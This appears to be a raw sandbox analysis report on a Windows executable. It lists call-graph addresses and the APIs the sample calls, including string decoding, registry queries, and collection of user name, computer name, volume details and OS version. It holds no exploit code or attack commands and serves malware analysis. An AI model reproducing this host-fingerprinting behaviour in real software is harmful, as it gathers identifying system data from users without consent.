5785->5786 5787 7ff670fc35a0 9 API calls 5785->5787 5788 7ff670fc3200 13 API calls 5786->5788 5787->5786 5789 7ff670fc583a 5788->5789 5790 7ff670fc3200 13 API calls 5789->5790 5791 7ff670fc584f 5790->5791 5792 7ff670fc5890 5791->5792 5794 7ff670fc588b 5791->5794 5797 7ff670fc5884 _invalid_parameter_noinfo_noreturn 5791->5797 5793 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5792->5793 5796 7ff670fc58a0 5793->5796 5795 7ff670fcda34 _Receive_impl free 5794->5795 5795->5792 5798 7ff670fccac0 5796->5798 5797->5794 5799 7ff670fccb18 5798->5799 5801 7ff670fccb1d 5798->5801 5800 7ff670fcb6a0 9 API calls 5799->5800 5800->5801 5802 7ff670fc3200 13 API calls 5801->5802 5803 7ff670fccb3a 5802->5803 5804 7ff670fc3200 13 API calls 5803->5804 5805 7ff670fccb53 5804->5805 5806 7ff670fc3200 13 API calls 5805->5806 5807 7ff670fcc08f 5806->5807 5807->5755 5807->5756 5807->5759 5809 7ff670fcc9d2 5808->5809 5810 7ff670fcc9b9 5808->5810 5811 7ff670fccaaf 5809->5811 5812 7ff670fcc9e8 5809->5812 5810->5779 5847 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 5811->5847 5813 7ff670fcc9ee memmove 5812->5813 5818 7ff670fcca14 5812->5818 5813->5779 5815 7ff670fcca20 5820 7ff670fcd9f0 4 API calls 5815->5820 5816 7ff670fccab4 5821 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5816->5821 5817 7ff670fcca84 memmove 5817->5779 5818->5815 5818->5816 5818->5817 5819 7ff670fcca7c 5818->5819 5824 7ff670fcd9f0 4 API calls 5819->5824 5822 7ff670fcca36 5820->5822 5823 7ff670fccaba 5821->5823 5825 7ff670fcca75 _invalid_parameter_noinfo_noreturn 5822->5825 5826 7ff670fcca3b 5822->5826 5824->5826 5825->5819 5826->5817 5828 7ff670fcb7dd 5827->5828 5833 7ff670fcb6c9 5827->5833 5848 7ff670fc11c0 ?_Xlength_error@std@@YAXPEBD 5828->5848 5830 7ff670fcb72e 5832 7ff670fcd9f0 4 API calls 5830->5832 5831 7ff670fcb7e2 5835 7ff670fc1120 Concurrency::cancel_current_task __std_exception_copy 5831->5835 5834 7ff670fcb714 5832->5834 5833->5830 5833->5834 5836 7ff670fcb721 5833->5836 5837 7ff670fcb759 5833->5837 5838 7ff670fcb7b0 _invalid_parameter_noinfo_noreturn 5834->5838 5841 7ff670fcb776 memmove 5834->5841 5842 7ff670fcb7b7 memmove 5834->5842 5840 7ff670fcb7e8 5835->5840 5836->5830 5836->5831 5839 7ff670fcd9f0 4 API calls 5837->5839 5838->5842 5839->5834 5843 7ff670fcb78e 5841->5843 5844 7ff670fcb7a3 5841->5844 5846 7ff670fcb7ae 5842->5846 5843->5838 5843->5844 5845 7ff670fcda34 _Receive_impl free 5844->5845 5845->5846 5846->5780 5850 7ff670fcd804 5849->5850 5850->5501 5854 7ff670fc55f0 5851->5854 5853 7ff670fc562e _CxxThrowException __std_exception_copy 5853->5499 5854->5853 5856 7ff670fccef0 5855->5856 5856->5856 5857 7ff670fccf0c 5856->5857 5858 7ff670fcb6a0 9 API calls 5856->5858 5859 7ff670fc3200 13 API calls 5857->5859 5858->5857 5860 7ff670fccf25 5859->5860 5861 7ff670fc3200 13 API calls 5860->5861 5862 7ff670fcc8aa 5861->5862 5862->5516 5864 7ff670fc2a20 5863->5864 5864->5864 5865 7ff670fc34a0 8 API calls 5864->5865 5866 7ff670fc2a2e 5865->5866 5867 7ff670fcbd00 5866->5867 5868 7ff670fc34a0 8 API calls 5867->5868 5869 7ff670fcbd51 5868->5869 5870 7ff670fc34a0 8 API calls 5869->5870 5871 7ff670fcbd77 5870->5871 5872 7ff670fc56c0 31 API calls 5871->5872 5873 7ff670fcbd8b 5872->5873 5874 7ff670fccac0 16 API calls 5873->5874 5875 7ff670fcbd9f 5874->5875 5876 7ff670fcbdd9 5875->5876 5877 7ff670fcbdde 5875->5877 5881 7ff670fcbdd2 _invalid_parameter_noinfo_noreturn 5875->5881 5882 7ff670fcda34 _Receive_impl free 5876->5882 5878 7ff670fcbe28 5877->5878 5880 7ff670fcbe2d 5877->5880 5883 7ff670fcbe21 _invalid_parameter_noinfo_noreturn 5877->5883 5884 7ff670fcda34 _Receive_impl free 5878->5884 5879 7ff670fcbe6c __std_exception_copy 5886 7ff670fcbed5 5879->5886 5887 7ff670fcbf09 5879->5887 5880->5879 5885 7ff670fcbe67 5880->5885 5889 7ff670fcbe60 _invalid_parameter_noinfo_noreturn 5880->5889 5881->5876 5882->5877 5883->5878 5884->5880 5890 7ff670fcda34 _Receive_impl free 5885->5890 5891 7ff670fcbf04 5886->5891 5894 7ff670fcbefd _invalid_parameter_noinfo_noreturn 5886->5894 5888 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5887->5888 5893 7ff670fca075 _CxxThrowException 5888->5893 5889->5885 5890->5879 5892 7ff670fcda34 _Receive_impl free 5891->5892 5892->5887 5894->5891 5895->5106 5897 7ff670fc83f3 5896->5897 5901 7ff670fc8420 5896->5901 5899 7ff670fc8483 _invalid_parameter_noinfo_noreturn 5897->5899 5900 7ff670fcda34 _Receive_impl free 5897->5900 5898 7ff670fc846a 5898->5115 5903 7ff670fc84d6 5899->5903 5908 7ff670fc849f 5899->5908 5900->5901 5901->5898 5901->5899 5904 7ff670fc8462 5901->5904 5902 7ff670fcda34 _Receive_impl free 5902->5898 5905 7ff670fc8519 5903->5905 5907 7ff670fc8543 _invalid_parameter_noinfo_noreturn 5903->5907 5911 7ff670fc8521 5903->5911 5904->5902 5910 7ff670fcda34 _Receive_impl free 5905->5910 5906 7ff670fc9f33 5906->5115 5907->5911 5908->5903 5908->5907 5909 7ff670fcda34 _Receive_impl free 5908->5909 5909->5903 5910->5911 5911->5906 5912 7ff670fc9ed8 5911->5912 5913 7ff670fc83e0 20 API calls 5911->5913 5914 7ff670fc9f28 5912->5914 5915 7ff670fc9f4b _invalid_parameter_noinfo_noreturn 5912->5915 5913->5911 5916 7ff670fcda34 _Receive_impl free 5914->5916 5917 7ff670fca640 20 API calls 5915->5917 5916->5906 5918 7ff670fc9f70 5917->5918 5918->5115 6038 7ff670fc8e9d 6039 7ff670fc8e62 6038->6039 6039->6038 6040 7ff670fc9056 6039->6040 6041 7ff670fc9138 6039->6041 6043 7ff670fc8eff 6039->6043 6042 7ff670fcd9f0 4 API calls 6040->6042 6044 7ff670fcb3b0 16 API calls 6041->6044 6045 7ff670fc906c 6042->6045 6046 7ff670fcbc00 12 API calls 6043->6046 6047 7ff670fc9150 6044->6047 6049 7ff670fcd610 6 API calls 6045->6049 6056 7ff670fc9051 6045->6056 6062 7ff670fc8f09 6046->6062 6048 7ff670fcbff0 39 API calls 6047->6048 6051 7ff670fc915d _CxxThrowException 6048->6051 6052 7ff670fc90b1 6049->6052 6050 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 6053 7ff670fc9118 6050->6053 6054 7ff670fc91b1 6051->6054 6055 7ff670fc91de 6051->6055 6052->6056 6060 7ff670fcab10 8 API calls 6052->6060 6058 7ff670fc91d6 6054->6058 6063 7ff670fc91f1 _invalid_parameter_noinfo_noreturn 6054->6063 6056->6050 6057 7ff670fcab10 8 API calls 6057->6062 6059 7ff670fcda34 _Receive_impl free 6058->6059 6059->6055 6060->6052 6061 7ff670fcd320 memcmp 6061->6062 6062->6056 6062->6057 6062->6061 6067 7ff670fcd540 memcmp 6062->6067 6068 7ff670fc9133 6062->6068 6071 7ff670fcd9f0 4 API calls 6062->6071 6075 7ff670fca640 20 API calls 6062->6075 6064 7ff670fc7080 20 API calls 6063->6064 6065 7ff670fc9212 6064->6065 6066 7ff670fc9248 6065->6066 6069 7ff670fc9240 6065->6069 6072 7ff670fc9261 _invalid_parameter_noinfo_noreturn 6065->6072 6067->6062 6070 7ff670fc5680 ?_Xlength_error@std@@YAXPEBD 6068->6070 6073 7ff670fcda34 _Receive_impl free 6069->6073 6070->6041 6071->6062 6077 7ff670fc92a0 __std_exception_copy __std_exception_copy 6072->6077 6073->6066 6075->6062 6076 7ff670fc927e 6077->6076 6315 7ff670fcdd98 6318 7ff670fce20c 6315->6318 6319 7ff670fcdda1 6318->6319 6320 7ff670fce22f GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6318->6320 6320->6319 4441 7ff670fc4130 RegOpenKeyExA 4442 7ff670fc41de 4441->4442 4443 7ff670fc417a RegQueryValueExA 4441->4443 4450 7ff670fc3eb0 4442->4450 4462 7ff670fc4530 4442->4462 4444 7ff670fc41d3 RegCloseKey 4443->4444 4445 7ff670fc41a9 4443->4445 4444->4442 4445->4444 4447 7ff670fc41b0 strstr 4445->4447 4447->4442 4447->4445 4453 7ff670fcd9d0 4450->4453 4454 7ff670fcd9d9 4453->4454 4455 7ff670fc423d 4454->4455 4456 7ff670fce084 IsProcessorFeaturePresent 4454->4456 4457 7ff670fce09c 4456->4457 4476 7ff670fce158 RtlCaptureContext 4457->4476 4465 7ff670fc4560 ?good@ios_base@std@ 4462->4465 4464 7ff670fc45b3 4466 7ff670fc45c9 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 4464->4466 4471 7ff670fc45e1 4464->4471 4465->4464 4465->4471 4466->4471 4468 7ff670fc463d ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 4472 7ff670fc45eb ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 4468->4472 4473 7ff670fc465a 4468->4473 4469 7ff670fc427e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 4469->4450 4470 7ff670fc46cd ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 4470->4469 4471->4468 4471->4472 4474 7ff670fc4615 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 4471->4474 4472->4469 4472->4470 4473->4472 4475 7ff670fc4665 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 4473->4475 4474->4471 4474->4472 4475->4472 4475->4473 4477 7ff670fce172 RtlLookupFunctionEntry 4476->4477 4478 7ff670fce0af 4477->4478 4479 7ff670fce188 RtlVirtualUnwind 4477->4479 4480 7ff670fce050 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 4478->4480 4479->4477 4479->4478 6078 7ff670fc58b0 __std_exception_destroy __std_exception_destroy 6079 7ff670fc58f8 6078->6079 6080 7ff670fc58eb 6078->6080 6081 7ff670fcda34 _Receive_impl free 6080->6081 6081->6079 6082 7ff670fc8eae 6083 7ff670fc8e62 6082->6083 6084 7ff670fc9056 6083->6084 6085 7ff670fc9138 6083->6085 6087 7ff670fc8eff 6083->6087 6086 7ff670fcd9f0 4 API calls 6084->6086 6088 7ff670fcb3b0 16 API calls 6085->6088 6089 7ff670fc906c 6086->6089 6090 7ff670fcbc00 12 API calls 6087->6090 6091 7ff670fc9150 6088->6091 6093 7ff670fcd610 6 API calls 6089->6093 6100 7ff670fc9051 6089->6100 6106 7ff670fc8f09 6090->6106 6092 7ff670fcbff0 39 API calls 6091->6092 6095 7ff670fc915d _CxxThrowException 6092->6095 6096 7ff670fc90b1 6093->6096 6094 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 6097 7ff670fc9118 6094->6097 6098 7ff670fc91b1 6095->6098 6099 7ff670fc91de 6095->6099 6096->6100 6104 7ff670fcab10 8 API calls 6096->6104 6102 7ff670fc91d6 6098->6102 6107 7ff670fc91f1 _invalid_parameter_noinfo_noreturn 6098->6107 6100->6094 6101 7ff670fcab10 8 API calls 6101->6106 6103 7ff670fcda34 _Receive_impl free 6102->6103 6103->6099 6104->6096 6105 7ff670fcd320 memcmp 6105->6106 6106->6100 6106->6101 6106->6105 6110 7ff670fcd540 memcmp 6106->6110 6111 7ff670fc9133 6106->6111 6115 7ff670fcd9f0 4 API calls 6106->6115 6119 7ff670fca640 20 API calls 6106->6119 6108 7ff670fc7080 20 API calls 6107->6108 6113 7ff670fc9212 6108->6113 6109 7ff670fc9248 6110->6106 6114 7ff670fc5680 ?_Xlength_error@std@@YAXPEBD 6111->6114 6112 7ff670fc9240 6117 7ff670fcda34 _Receive_impl free 6112->6117 6113->6109 6113->6112 6116 7ff670fc9261 _invalid_parameter_noinfo_noreturn 6113->6116 6114->6085 6115->6106 6121 7ff670fc92a0 __std_exception_copy __std_exception_copy 6116->6121 6117->6109 6119->6106 6120 7ff670fc927e 6121->6120 6194 7ff670fcd930 6195 7ff670fcd952 6194->6195 6196 7ff670fcd96f 6195->6196 6197 7ff670fcd968 LocalFree 6195->6197 6198 7ff670fcd982 6196->6198 6199 7ff670fcda34 _Receive_impl free 6196->6199 6197->6196 6199->6198 6321 7ff670fc9fac 6322 7ff670fcbc00 12 API calls 6321->6322 6323 7ff670fc9fb1 6322->6323 5919 7ff670fc40ac RegOpenKeyExA 5920 7ff670fc40e3 RegQueryValueExA 5919->5920 5923 7ff670fc41de 5919->5923 5921 7ff670fc41d8 RegCloseKey 5920->5921 5922 7ff670fc411c RegCloseKey 5920->5922 5921->5923 5922->5923 5924 7ff670fc4530 9 API calls 5923->5924 5926 7ff670fc3eb0 5923->5926 5925 7ff670fc427e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5924->5925 5925->5926 5927 7ff670fcd9d0 Concurrency::cancel_current_task 8 API calls 5926->5927 5928 7ff670fc423d 5927->5928 6420 7ff670fc342c 6421 7ff670fc343a ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 6420->6421 6422 7ff670fc3474 6421->6422 6423 7ff670fc346a ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 6421->6423 6423->6422 6424 7ff670fcec28 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N

                                        Executed Functions

                                        Function 00007FF670FC70A0 Relevance: 81.5, APIs: 27, Strings: 19, Instructions: 981COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 7ff670fc70a0-7ff670fc7125 call 7ff670fc34a0 call 7ff670fc6000 5 7ff670fc7127-7ff670fc7139 0->5 6 7ff670fc715c-7ff670fc74af call 7ff670fca640 call 7ff670fcd9f0 call 7ff670fc34a0 call 7ff670fc6440 call 7ff670fc8e00 * 3 call 7ff670fcda68 * 2 call 7ff670fca640 call 7ff670fcda68 call 7ff670fca640 _Xtime_get_ticks memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ _gmtime64 0->6 7 7ff670fc7157 call 7ff670fcda34 5->7 8 7ff670fc713b-7ff670fc714e 5->8 35 7ff670fc74b0-7ff670fc74bb 6->35 7->6 8->7 10 7ff670fc7150-7ff670fc7156 _invalid_parameter_noinfo_noreturn 8->10 10->7 35->35 36 7ff670fc74bd-7ff670fc751c call 7ff670fcb100 35->36 39 7ff670fc754f-7ff670fc7552 36->39 40 7ff670fc751e-7ff670fc752c 36->40 42 7ff670fc7554-7ff670fc7562 39->42 43 7ff670fc7582-7ff670fc7587 39->43 40->39 41 7ff670fc752e-7ff670fc754d 40->41 44 7ff670fc758c-7ff670fc758f 41->44 42->43 45 7ff670fc7564-7ff670fc7580 42->45 43->44 46 7ff670fc75a1-7ff670fc762b call 7ff670fca640 call 7ff670fcd9f0 call 7ff670fc34a0 call 7ff670fcc6e0 44->46 47 7ff670fc7591-7ff670fc759b call 7ff670fc30a0 44->47 45->44 58 7ff670fc7649-7ff670fc764c 46->58 59 7ff670fc762d-7ff670fc7645 call 7ff670fcd9f0 46->59 47->46 60 7ff670fc7db4-7ff670fc7dfa call 7ff670fca0b0 call 7ff670fcb3b0 call 7ff670fcb470 _CxxThrowException 58->60 61 7ff670fc7652-7ff670fc766a 58->61 59->58 87 7ff670fc7dfb call 7ff670fc11c0 60->87 64 7ff670fc76ad-7ff670fc778f call 7ff670fc34a0 call 7ff670fcc6e0 call 7ff670fca640 call 7ff670fc8ae0 61->64 65 7ff670fc766c-7ff670fc767b 61->65 92 7ff670fc7792-7ff670fc7795 64->92 68 7ff670fc7687-7ff670fc768a 65->68 69 7ff670fc767d-7ff670fc7685 call 7ff670fccb90 65->69 73 7ff670fc76a9 68->73 74 7ff670fc768c 68->74 69->64 73->64 78 7ff670fc7690-7ff670fc76a7 call 7ff670fc9f80 74->78 78->73 91 7ff670fc7e00-7ff670fc7e4c call 7ff670fc1120 call 7ff670fce000 87->91 118 7ff670fc7e52-7ff670fc7ebe call 7ff670fc34a0 GetUserNameW call 7ff670fc21a0 91->118 119 7ff670fc83b8-7ff670fc83df call 7ff670fcd9d0 91->119 94 7ff670fc7875-7ff670fc7889 92->94 95 7ff670fc779b-7ff670fc77a3 92->95 94->87 97 7ff670fc788f-7ff670fc78c6 94->97 98 7ff670fc77a5-7ff670fc77d2 call 7ff670fc3200 95->98 99 7ff670fc77d4-7ff670fc77d8 95->99 101 7ff670fc78c8-7ff670fc78d2 97->101 102 7ff670fc7946-7ff670fc7a54 memmove call 7ff670fc3200 * 2 97->102 98->92 105 7ff670fc7809-7ff670fc780c 99->105 106 7ff670fc77da-7ff670fc7807 call 7ff670fc3200 99->106 107 7ff670fc7900-7ff670fc7913 101->107 108 7ff670fc78d4-7ff670fc78e1 101->108 140 7ff670fc7a56-7ff670fc7a68 102->140 141 7ff670fc7a8b-7ff670fc7a9f 102->141 113 7ff670fc7850-7ff670fc7870 call 7ff670fc35a0 105->113 114 7ff670fc780e-7ff670fc784b 105->114 106->92 120 7ff670fc7915-7ff670fc7918 107->120 121 7ff670fc791a-7ff670fc7921 107->121 116 7ff670fc78e5-7ff670fc78f0 call 7ff670fcd9f0 108->116 113->92 114->92 138 7ff670fc7932-7ff670fc7938 _invalid_parameter_noinfo_noreturn 116->138 139 7ff670fc78f2-7ff670fc78fe 116->139 153 7ff670fc7ec0-7ff670fc7ec9 118->153 154 7ff670fc7ecb-7ff670fc7f50 call 7ff670fc2cc0 call 7ff670fc20b0 call 7ff670fc34a0 GetComputerNameW call 7ff670fc21a0 118->154 128 7ff670fc7941 120->128 129 7ff670fc7923-7ff670fc792a 121->129 130 7ff670fc7939-7ff670fc793e call 7ff670fcd9f0 121->130 128->102 129->91 136 7ff670fc7930 129->136 130->128 136->116 138->130 139->128 143 7ff670fc7a86 call 7ff670fcda34 140->143 144 7ff670fc7a6a-7ff670fc7a7d 140->144 146 7ff670fc7aa1-7ff670fc7ab3 141->146 147 7ff670fc7ad6-7ff670fc7b63 call 7ff670fc61c0 call 7ff670fc4530 call 7ff670fc3ac0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 141->147 143->141 144->143 151 7ff670fc7a7f-7ff670fc7a85 _invalid_parameter_noinfo_noreturn 144->151 148 7ff670fc7ad1 call 7ff670fcda34 146->148 149 7ff670fc7ab5-7ff670fc7ac8 146->149 168 7ff670fc7b65-7ff670fc7b7a 147->168 169 7ff670fc7b9d-7ff670fc7bc5 147->169 148->147 149->148 155 7ff670fc7aca-7ff670fc7ad0 _invalid_parameter_noinfo_noreturn 149->155 151->143 153->153 153->154 186 7ff670fc7f52-7ff670fc7f5b 154->186 187 7ff670fc7f5d-7ff670fc8027 call 7ff670fc2cc0 call 7ff670fc20b0 call 7ff670fc34a0 call 7ff670fc1450 call 7ff670fc34a0 GetVolumeInformationW 154->187 155->148 173 7ff670fc7b98 call 7ff670fcda34 168->173 174 7ff670fc7b7c-7ff670fc7b8f 168->174 170 7ff670fc7bff-7ff670fc7c1c 169->170 171 7ff670fc7bc7-7ff670fc7bdc 169->171 177 7ff670fc7c1e-7ff670fc7c33 170->177 178 7ff670fc7c56-7ff670fc7c7e 170->178 175 7ff670fc7bde-7ff670fc7bf1 171->175 176 7ff670fc7bfa call 7ff670fcda34 171->176 173->169 174->173 180 7ff670fc7b91-7ff670fc7b97 _invalid_parameter_noinfo_noreturn 174->180 175->176 182 7ff670fc7bf3-7ff670fc7bf9 _invalid_parameter_noinfo_noreturn 175->182 176->170 184 7ff670fc7c51 call 7ff670fcda34 177->184 185 7ff670fc7c35-7ff670fc7c48 177->185 188 7ff670fc7c80-7ff670fc7c95 178->188 189 7ff670fc7cb8-7ff670fc7d42 call 7ff670fc2870 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff670fca640 178->189 180->173 182->176 184->178 185->184 191 7ff670fc7c4a-7ff670fc7c50 _invalid_parameter_noinfo_noreturn 185->191 186->186 186->187 219 7ff670fc808e-7ff670fc80ab call 7ff670fc34a0 187->219 220 7ff670fc8029-7ff670fc805f call 7ff670fc3280 call 7ff670fc21a0 187->220 194 7ff670fc7cb3 call 7ff670fcda34 188->194 195 7ff670fc7c97-7ff670fc7caa 188->195 204 7ff670fc7d44-7ff670fc7d59 189->204 205 7ff670fc7d7d-7ff670fc7db3 call 7ff670fcd9d0 189->205 191->184 194->189 195->194 199 7ff670fc7cac-7ff670fc7cb2 _invalid_parameter_noinfo_noreturn 195->199 199->194 208 7ff670fc7d77-7ff670fc7d7c call 7ff670fcda34 204->208 209 7ff670fc7d5b-7ff670fc7d6e 204->209 208->205 209->208 212 7ff670fc7d70-7ff670fc7d76 _invalid_parameter_noinfo_noreturn 209->212 212->208 223 7ff670fc80b0-7ff670fc810a call 7ff670fc34a0 memset GetVersionExW 219->223 231 7ff670fc8061-7ff670fc806a 220->231 232 7ff670fc806c-7ff670fc808c call 7ff670fc2cc0 call 7ff670fc20b0 220->232 229 7ff670fc8113-7ff670fc8133 GetModuleHandleW GetProcAddress 223->229 230 7ff670fc810c-7ff670fc810e 223->230 234 7ff670fc8135-7ff670fc8137 229->234 235 7ff670fc8139-7ff670fc818c call 7ff670fc1390 229->235 233 7ff670fc8191-7ff670fc8193 230->233 231->231 231->232 232->223 238 7ff670fc81e3-7ff670fc820c call 7ff670fc34a0 233->238 239 7ff670fc8195-7ff670fc81b1 call 7ff670fc21a0 233->239 234->233 235->233 245 7ff670fc8211-7ff670fc82e8 call 7ff670fc34a0 call 7ff670fc1780 call 7ff670fc85b0 call 7ff670fcda68 call 7ff670fc34a0 call 7ff670fc70a0 238->245 248 7ff670fc81b3-7ff670fc81bc 239->248 249 7ff670fc81be-7ff670fc81e1 call 7ff670fc2cc0 call 7ff670fc20b0 239->249 266 7ff670fc82ed-7ff670fc8303 245->266 248->248 248->249 249->245 267 7ff670fc8305-7ff670fc8310 266->267 268 7ff670fc8351-7ff670fc835c 266->268 269 7ff670fc8342-7ff670fc834a 267->269 270 7ff670fc8312-7ff670fc8326 267->270 271 7ff670fc835e-7ff670fc8372 268->271 272 7ff670fc839d-7ff670fc83b3 call 7ff670fc9ea0 268->272 269->268 274 7ff670fc833d call 7ff670fcda34 270->274 275 7ff670fc8328-7ff670fc833b 270->275 276 7ff670fc8374-7ff670fc8387 271->276 277 7ff670fc8390-7ff670fc8395 call 7ff670fcda34 271->277 272->119 274->269 275->274 279 7ff670fc8389-7ff670fc838f _invalid_parameter_noinfo_noreturn 275->279 276->277 276->279 277->272 279->277
                                        APIs
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC34D8
                                          • Part of subcall function 00007FF670FC6000: CryptStringToBinaryA.CRYPT32 ref: 00007FF670FC6065
                                          • Part of subcall function 00007FF670FC6000: memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF670FC60A6
                                          • Part of subcall function 00007FF670FC6000: CryptStringToBinaryA.CRYPT32 ref: 00007FF670FC60DF
                                          • Part of subcall function 00007FF670FC6000: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF670FC6141
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7150
                                        • _Xtime_get_ticks.MSVCP140 ref: 00007FF670FC7397
                                        • memset.VCRUNTIME140 ref: 00007FF670FC73D6
                                        • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF670FC7401
                                        • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF670FC7423
                                        • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF670FC7466
                                        • _gmtime64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF670FC7493
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7932
                                        • memmove.VCRUNTIME140 ref: 00007FF670FC798D
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7A7F
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7ACA
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF670FC7B50
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7B91
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7BF3
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7C4A
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7CAC
                                        • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF670FC7D0B
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF670FC7D19
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FC7D70
                                          • Part of subcall function 00007FF670FCB470: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCB53E
                                          • Part of subcall function 00007FF670FCB470: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCB58D
                                          • Part of subcall function 00007FF670FCB470: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCB5CC
                                        • _CxxThrowException.VCRUNTIME140 ref: 00007FF670FC7DF5
                                          • Part of subcall function 00007FF670FC11C0: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF670FC11CB
                                          • Part of subcall function 00007FF670FC34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF670FC14B3), ref: 00007FF670FC3579
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FC7E00
                                        • GetUserNameW.ADVAPI32 ref: 00007FF670FC7E9D
                                        • GetComputerNameW.KERNEL32 ref: 00007FF670FC7F2E
                                        • GetVolumeInformationW.KERNELBASE ref: 00007FF670FC801F
                                        • memset.VCRUNTIME140 ref: 00007FF670FC80EC
                                        • GetVersionExW.KERNEL32 ref: 00007FF670FC8102
                                          • Part of subcall function 00007FF670FC3280: __stdio_common_vswprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF670FC32C3
                                          • Part of subcall function 00007FF670FC21A0: ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z.MSVCP140 ref: 00007FF670FC21C0
                                          • Part of subcall function 00007FF670FC21A0: ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z.MSVCP140 ref: 00007FF670FC2216
                                          • Part of subcall function 00007FF670FC21A0: ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z.MSVCP140 ref: 00007FF670FC2232
                                          • Part of subcall function 00007FF670FC21A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF670FC2242
                                          • Part of subcall function 00007FF670FC21A0: ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z.MSVCP140 ref: 00007FF670FC2251
                                          • Part of subcall function 00007FF670FC21A0: ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z.MSVCP140 ref: 00007FF670FC2265
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
